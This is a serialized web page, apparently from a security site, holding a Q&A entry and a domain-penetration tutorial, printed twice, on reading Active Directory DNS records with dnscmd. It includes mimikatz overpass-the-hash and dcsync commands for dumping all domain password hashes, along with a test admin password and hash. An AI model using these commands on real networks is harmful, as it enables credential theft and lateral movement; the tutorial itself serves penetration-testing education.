[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEg6AviRmbcP46S2Rmh2GOrdhPT_uWNm7b8LMKFK3Z3c":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},639,"How can I remotely read DNS records from a Windows 7 machine that lacks RSAT?","First, copy `dnscmd.exe` to `C:\\Windows\\System32` and `dnscmd.exe.mui` to `C:\\Windows\\System32\\en-US` from a Windows Server 2008 R2 system. Then use mimikatz's Overpass-the-hash technique to spawn a command prompt with domain admin credentials (e.g., `sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:HASH`). In that prompt, run `Dnscmd \u003CDNS_SERVER_FQDN> \u002FEnumZones` to query remotely. This method bypasses the need for RSAT installation, as explained in the article on [remote DLL loading](\u002Fnews\u002Fdomain-penetration-remote-dll-loading-on-dns-server-using-dnscmd).","\u003Cp>First, copy `dnscmd.exe` to `C:\\Windows\\System32` and `dnscmd.exe.mui` to `C:\\Windows\\System32\\en-US` from a Windows Server 2008 R2 system. Then use mimikatz&#39;s Overpass-the-hash technique to spawn a command prompt with domain admin credentials (e.g., `sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:HASH`). In that prompt, run `Dnscmd &lt;DNS_SERVER_FQDN&gt; \u002FEnumZones` to query remotely. This method bypasses the need for RSAT installation, as explained in the article on [remote DLL loading](\u002Fnews\u002Fdomain-penetration-remote-dll-loading-on-dns-server-using-dnscmd).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-obtaining-dns-records\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-i-remotely-read-dns-records-from-a-windows-7-machine-that-lacks-rsat-1777482586551","remote DNS records, Overpass-the-hash, dnscmd, RSAT bypass, mimikatz",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},158,"Domain Penetration - Obtaining DNS Records","domain-penetration-obtaining-dns-records","Learn how to obtain DNS records in domain penetration after gaining DNS admin privileges using DNS Manager, dnscmd, and remote methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In domain penetration, gathering information about the domain environment is crucial. If we obtain domain administrator privileges, how can we quickly understand the network architecture within the domain? DNS records are undoubtedly an excellent reference.\u003C\u002Fp>\u003Cp>This article will introduce methods for obtaining DNS records after gaining DNS administrator privileges during domain penetration.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Obtaining DNS records via DNS Manager\u003C\u002Fli>\u003Cli>Obtaining DNS records via dnscmd\u003C\u002Fli>\u003Cli>Methods for remotely reading DNS records within the domain\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Obtaining DNS Records via DNS Manager\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test System:\u003C\u002Fp>\u003Cp>Windows Server 2008 R2 x64\u003C\u002Fp>\u003Cp>Select Administrative Tools -&gt; DNS\u003C\u002Fp>\u003Cp>Under Forward Lookup Zones, locate the current domain name to display DNS records within the current domain, including hostnames and corresponding IP addresses\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017322492_0_30823b5120.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Obtain DNS records via dnscmd\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>dnscmd:\u003C\u002Fp>\u003Cp>A command-line interface for managing DNS servers, supporting remote connections\u003C\u002Fp>\u003Cp>Default installed systems:\u003C\u002Fp>\u003Cul>\u003Cli>Windows Server 2003\u003C\u002Fli>\u003Cli>Windows Server 2008\u003C\u002Fli>\u003Cli>Windows Server 2003 R2\u003C\u002Fli>\u003Cli>Windows Server 2008 R2\u003C\u002Fli>\u003Cli>Windows Server 2012\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP1\u003C\u002Fli>\u003Cli>...\u003C\u002Fli>\u003C\u002Ful>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Fwindows\u002Fit-pro\u002Fwindows-server-2012-R2-and-2012\u002Fcc772069(v=ws.11)\u003C\u002Fp>\u003Cp>Win7 systems require installation of Remote Server Administration Tools (RSAT) for use\u003C\u002Fp>\u003Cp>Reference URL:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F2693643\u002Fremote-server-administration-tools-rsat-for-windows-operating-systems\u003C\u002Fp>\u003Cp>RSAT Download URL:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fdownload\u002Fdetails.aspx?id=7887\u003C\u002Fp>\u003Cp>Test System:\u003C\u002Fp>\u003Cp>Windows Server 2008 R2 x64\u003C\u002Fp>\u003Cp>Common Commands:\u003C\u002Fp>\u003Ch4>(1) List resource records for the current node in the DNS zone:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd . \u002FEnumZones\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017372902_1_f21afce1bc.jpeg\">\u003C\u002Fp>\u003Ch4>(2) List information for test.com:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd . \u002FZoneInfo test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017394294_2_107a7eb268.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Enumerate records in test.com, Method 1 (more detailed):\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd . \u002FZonePrint test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017436321_3_ae2b61efa4.jpeg\">\u003C\u002Fp>\u003Ch4>(4) Enumerate records for test.com, Method 2:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd . \u002FEnumRecords test.com .\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017466285_4_00c3626a41.jpeg\">\u003C\u002Fp>\u003Cp>The results are consistent with those obtained from DNS Manager\u003C\u002Fp>\u003Ch2>0x04 Methods for Remotely Reading DNS Records within a Domain\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Method Analysis\u003C\u002Fh3>\u003Cp>Prerequisite: Domain administrator privileges are required\u003C\u002Fp>\u003Cp>The first method is to remotely connect to the domain controller and then execute dnscmd on the domain controller to obtain DNS records\u003C\u002Fp>\u003Cp>The second method is to execute dnscmd remotely on a host within the domain to read DNS records\u003C\u002Fp>\u003Cp>However, Windows 7 systems do not support dnscmd by default, and installing Remote Server Administration Tools (RSAT) directly is not feasible\u003C\u002Fp>\u003Cp>Therefore, I attempted to find a method to execute dnscmd on systems without Remote Server Administration Tools (RSAT) installed\u003C\u002Fp>\u003Ch3>Method Testing\u003C\u002Fh3>\u003Cp>Copy a dnscmd.exe to a Windows 7 system without Remote Server Administration Tools (RSAT) installed and execute it directly, but it failed\u003C\u002Fp>\u003Ch3>Solution\u003C\u002Fh3>\u003Cp>Use Process Monitor to record the execution process of dnscmd and identify which files are missing\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017480416_5_ea6e161cc2.jpeg\">\u003C\u002Fp>\u003Cp>It was found that the file dnscmd.exe.mui was missing\u003C\u002Fp>\u003Cp>After supplementing the missing files and testing again, the solution was finally found\u003C\u002Fp>\u003Cp>To execute dnscmd on a system without Remote Server Administration Tools (RSAT) installed, the following conditions must be met:\u003C\u002Fp>\u003Col>\u003Cli>dnscmd is stored in the path C:\\Windows\\System32\u003C\u002Fli>\u003Cli>dnscmd.exe.mui is stored in C:\\Windows\\System32\\en-US (this location is relatively common and may also be found elsewhere)\u003C\u002Fli>\u003C\u002Fol>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>dnscmd and dnscmd.exe.mui can be used from Windows Server 2008 R2\u003C\u002Fp>\u003Cp>A test file is provided here (obtained from Windows Server 2008 R2):\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For testing purposes only\u003C\u002Fp>\u003Cp>Since dnscmd does not provide an interface for entering username and password during remote connections, Overpass-the-hash from mimikatz is required here\u003C\u002Fp>\u003Cp>First, the hash of the domain administrator user needs to be obtained, only ntlm\u002Frc4\u002Faes128\u002Faes256 can be used\u003C\u002Fp>\u003Cp>If the plaintext password of the domain administrator user is obtained, it can first be converted to ntlm, online encryption website:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmd5decrypt.net\u002Fen\u002FNtlm\u002F\u003C\u002Fp>\u003Cp>Supplement: Method to obtain hashes of all users in the domain using dcsync\u003C\u002Fp>\u003Cp>Execute mimikatz on the domain controller:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.local \u002Fall \u002Fcsv exit\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Actual testing\u003C\u002Fh3>\u003Cp>Test environment parameters are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Domain administrator user: Administrator\u003C\u002Fli>\u003Cli>Password: DomainAdmin456!\u003C\u002Fli>\u003Cli>Hash: A55E0720F0041193632A58E007624B40\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Overpass-the-hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:A55E0720F0041193632A58E007624B40\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This will launch a cmd.exe window\u003C\u002Fp>\u003Cp>Then use dnscmd for remote connection query:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd WIN-F08C969D7FM.test.com \u002FEnumZones\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd WIN-F08C969D7FM \u002FEnumZones\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>FQDN or computer name must be used here\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017490289_6_c5a1e9c173.jpeg\">\u003C\u002Fp>\u003Cp>If you want to implement the entire process in the command line, you can use the following method:\u003C\u002Fp>\u003Cp>Create c:\\test\\1.bat with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd WIN-F08C969D7FM.test.com \u002FEnumZones &gt; c:\\test\\out.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Overpass-the-hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:A55E0720F0041193632A58E007624B40 \u002Frun:\\\"cmd.exe \u002Fc c:\\test\\1.bat\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In cmd.exe, \" must be escaped as \\\"\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of using Overpass-the-hash within a domain to remotely read DNS records via dnscmd\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In domain penetration, gathering information about the domain environment is crucial. If we obtain domain administrator privileges, how can we quickly understand the network architecture within the domain? DNS records are undoubtedly an excellent reference.\u003C\u002Fp>\u003Cp>This article will introduce methods for obtaining DNS records after gaining DNS administrator privileges during domain penetration.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Obtaining DNS records via DNS Manager\u003C\u002Fli>\u003Cli>Obtaining DNS records via dnscmd\u003C\u002Fli>\u003Cli>Methods for remotely reading DNS records within the domain\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Obtaining DNS Records via DNS Manager\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test System:\u003C\u002Fp>\u003Cp>Windows Server 2008 R2 x64\u003C\u002Fp>\u003Cp>Select Administrative Tools -&gt; DNS\u003C\u002Fp>\u003Cp>Under Forward Lookup Zones, locate the current domain name to display DNS records within the current domain, including hostnames and corresponding IP addresses\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017322492_0_30823b5120-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Obtain DNS records via dnscmd\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>dnscmd:\u003C\u002Fp>\u003Cp>A command-line interface for managing DNS servers, supporting remote connections\u003C\u002Fp>\u003Cp>Default installed systems:\u003C\u002Fp>\u003Cul>\u003Cli>Windows Server 2003\u003C\u002Fli>\u003Cli>Windows Server 2008\u003C\u002Fli>\u003Cli>Windows Server 2003 R2\u003C\u002Fli>\u003Cli>Windows Server 2008 R2\u003C\u002Fli>\u003Cli>Windows Server 2012\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP1\u003C\u002Fli>\u003Cli>...\u003C\u002Fli>\u003C\u002Ful>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Fwindows\u002Fit-pro\u002Fwindows-server-2012-R2-and-2012\u002Fcc772069(v=ws.11)\u003C\u002Fp>\u003Cp>Win7 systems require installation of Remote Server Administration Tools (RSAT) for use\u003C\u002Fp>\u003Cp>Reference URL:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F2693643\u002Fremote-server-administration-tools-rsat-for-windows-operating-systems\u003C\u002Fp>\u003Cp>RSAT Download URL:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fdownload\u002Fdetails.aspx?id=7887\u003C\u002Fp>\u003Cp>Test System:\u003C\u002Fp>\u003Cp>Windows Server 2008 R2 x64\u003C\u002Fp>\u003Cp>Common Commands:\u003C\u002Fp>\u003Ch4>(1) List resource records for the current node in the DNS zone:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd . \u002FEnumZones\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017372902_1_f21afce1bc-1.jpeg\">\u003C\u002Fp>\u003Ch4>(2) List information for test.com:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd . \u002FZoneInfo test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017394294_2_107a7eb268-1.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Enumerate records in test.com, Method 1 (more detailed):\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd . \u002FZonePrint test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017436321_3_ae2b61efa4-1.jpeg\">\u003C\u002Fp>\u003Ch4>(4) Enumerate records for test.com, Method 2:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd . \u002FEnumRecords test.com .\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017466285_4_00c3626a41-1.jpeg\">\u003C\u002Fp>\u003Cp>The results are consistent with those obtained from DNS Manager\u003C\u002Fp>\u003Ch2>0x04 Methods for Remotely Reading DNS Records within a Domain\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Method Analysis\u003C\u002Fh3>\u003Cp>Prerequisite: Domain administrator privileges are required\u003C\u002Fp>\u003Cp>The first method is to remotely connect to the domain controller and then execute dnscmd on the domain controller to obtain DNS records\u003C\u002Fp>\u003Cp>The second method is to execute dnscmd remotely on a host within the domain to read DNS records\u003C\u002Fp>\u003Cp>However, Windows 7 systems do not support dnscmd by default, and installing Remote Server Administration Tools (RSAT) directly is not feasible\u003C\u002Fp>\u003Cp>Therefore, I attempted to find a method to execute dnscmd on systems without Remote Server Administration Tools (RSAT) installed\u003C\u002Fp>\u003Ch3>Method Testing\u003C\u002Fh3>\u003Cp>Copy a dnscmd.exe to a Windows 7 system without Remote Server Administration Tools (RSAT) installed and execute it directly, but it failed\u003C\u002Fp>\u003Ch3>Solution\u003C\u002Fh3>\u003Cp>Use Process Monitor to record the execution process of dnscmd and identify which files are missing\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017480416_5_ea6e161cc2-1.jpeg\">\u003C\u002Fp>\u003Cp>It was found that the file dnscmd.exe.mui was missing\u003C\u002Fp>\u003Cp>After supplementing the missing files and testing again, the solution was finally found\u003C\u002Fp>\u003Cp>To execute dnscmd on a system without Remote Server Administration Tools (RSAT) installed, the following conditions must be met:\u003C\u002Fp>\u003Col>\u003Cli>dnscmd is stored in the path C:\\Windows\\System32\u003C\u002Fli>\u003Cli>dnscmd.exe.mui is stored in C:\\Windows\\System32\\en-US (this location is relatively common and may also be found elsewhere)\u003C\u002Fli>\u003C\u002Fol>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>dnscmd and dnscmd.exe.mui can be used from Windows Server 2008 R2\u003C\u002Fp>\u003Cp>A test file is provided here (obtained from Windows Server 2008 R2):\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For testing purposes only\u003C\u002Fp>\u003Cp>Since dnscmd does not provide an interface for entering username and password during remote connections, Overpass-the-hash from mimikatz is required here\u003C\u002Fp>\u003Cp>First, the hash of the domain administrator user needs to be obtained, only ntlm\u002Frc4\u002Faes128\u002Faes256 can be used\u003C\u002Fp>\u003Cp>If the plaintext password of the domain administrator user is obtained, it can first be converted to ntlm, online encryption website:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmd5decrypt.net\u002Fen\u002FNtlm\u002F\u003C\u002Fp>\u003Cp>Supplement: Method to obtain hashes of all users in the domain using dcsync\u003C\u002Fp>\u003Cp>Execute mimikatz on the domain controller:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.local \u002Fall \u002Fcsv exit\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Actual testing\u003C\u002Fh3>\u003Cp>Test environment parameters are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Domain administrator user: Administrator\u003C\u002Fli>\u003Cli>Password: DomainAdmin456!\u003C\u002Fli>\u003Cli>Hash: A55E0720F0041193632A58E007624B40\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Overpass-the-hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:A55E0720F0041193632A58E007624B40\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This will launch a cmd.exe window\u003C\u002Fp>\u003Cp>Then use dnscmd for remote connection query:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd WIN-F08C969D7FM.test.com \u002FEnumZones\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd WIN-F08C969D7FM \u002FEnumZones\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>FQDN or computer name must be used here\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017490289_6_c5a1e9c173-1.jpeg\">\u003C\u002Fp>\u003Cp>If you want to implement the entire process in the command line, you can use the following method:\u003C\u002Fp>\u003Cp>Create c:\\test\\1.bat with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dnscmd WIN-F08C969D7FM.test.com \u002FEnumZones &gt; c:\\test\\out.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Overpass-the-hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:A55E0720F0041193632A58E007624B40 \u002Frun:\\\"cmd.exe \u002Fc c:\\test\\1.bat\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In cmd.exe, \" must be escaped as \\\"\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of using Overpass-the-hash within a domain to remotely read DNS records via dnscmd\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",863,"Onedaysec",4,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Domain Penetration: Obtaining DNS Records After Gaining Admin Privileges","domain penetration, DNS records, dnscmd, DNS manager, remote DNS reading, domain admin privileges",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],640,638,637,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.179Z","2026-07-23T16:01:53.452Z","draft","2026-07-23T16:13:56.020Z"]